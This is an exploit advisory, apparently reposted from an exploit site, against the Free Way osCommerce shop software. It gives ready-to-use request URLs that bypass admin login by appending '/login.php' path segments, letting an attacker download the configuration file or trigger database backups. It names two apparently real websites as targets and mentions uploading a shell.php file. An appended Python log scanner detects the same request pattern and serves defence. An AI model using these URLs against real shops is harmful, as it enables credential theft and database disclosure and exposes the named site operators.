========================================================
Free Way osCommerce Remote File Upload / File Disclosure
========================================================

Site: 1337day.com

#######################################################
# Vendor: http://www.zac-ware.com/
# Author : indoushka +++=[ Dz Offenders Cr3w ]=+++
# KedAns-Dz * Caddy-Dz * Kalashinkov3
# Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz
# Contact : ind0ushka@hotmail.com
# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
########################################################################
# Exploit By indoushka
-------------
creloaded - Remote File Upload

UPLOAD FILE:


CREATE FILE:
FILE NAME:
  (ex. shell.php)
FILE CONTENTS:
# File Disclosure :

in : admin/shop_file_manager.php/login.php?action=download&filename=

Exploit : admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php

Example : http://[site]/[path]/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php

Bypass, create and download a backup :

http://jumpingfiestarentals.com/admin/backups/db_freewaydb3-20111019144921.sql
https://secure.superc.com.au/admin/shop_backup.php/login.php?action=backupnow

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel
===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te * ViRuS_HiMa * KedAns-Dz * Over-X
--------------------------------------------------------------------------------------------------------------------------------------
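
Detection note (added example, not part of the original advisory or the vendor's code): every request shown above has the same shape, an admin script followed by extra /login.php path segments. The Python sketch below flags that shape in web-server access logs. It assumes Common Log Format and the default "admin" directory name; the log lines and addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Admin script followed by one or more trailing "/login.php" path segments,
# the request shape shown in this advisory (assumes the default "admin" dir).
BYPASS_PATH = re.compile(r"/admin/(?P<script>[\w.-]+\.php)(?:/login\.php)+$", re.I)
# Request line and status inside a Common Log Format entry (assumed format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /shop/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php HTTP/1.1" 200 4312
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/admin/shop_backup.php/login.php?action=backupnow HTTP/1.1" 302 0
198.51.100.20 - - [01/Jan/2024:10:05:00 +0000] "GET /shop/admin/login.php HTTP/1.1" 200 2210
198.51.100.20 - - [01/Jan/2024:10:05:30 +0000] "POST /shop/admin/shop_file_manager.php?action=upload HTTP/1.1" 200 812
"""

def classify(line):
    """Return a finding dict for a log line with the bypass shape, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Decode percent-encoding so an encoded "/login.php" suffix is still seen.
    hit = BYPASS_PATH.search(unquote(url.path))
    if not hit:
        return None
    query = parse_qs(url.query)
    action = query.get("action", [""])[0].lower()
    status = int(m.group("status"))
    return {
        "client": line.split(" ", 1)[0],
        "script": hit.group("script"),
        "action": action,
        "filename": query.get("filename", [""])[0],
        "status": status,
        # A 200 on download/backupnow suggests the server returned data.
        "served": status == 200 and action in {"download", "backupnow"},
    }

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.strip().splitlines()):
        print(finding)
```

Findings with "served" set are the ones to triage first: the named configuration or backup file should be treated as disclosed and the credentials in it rotated.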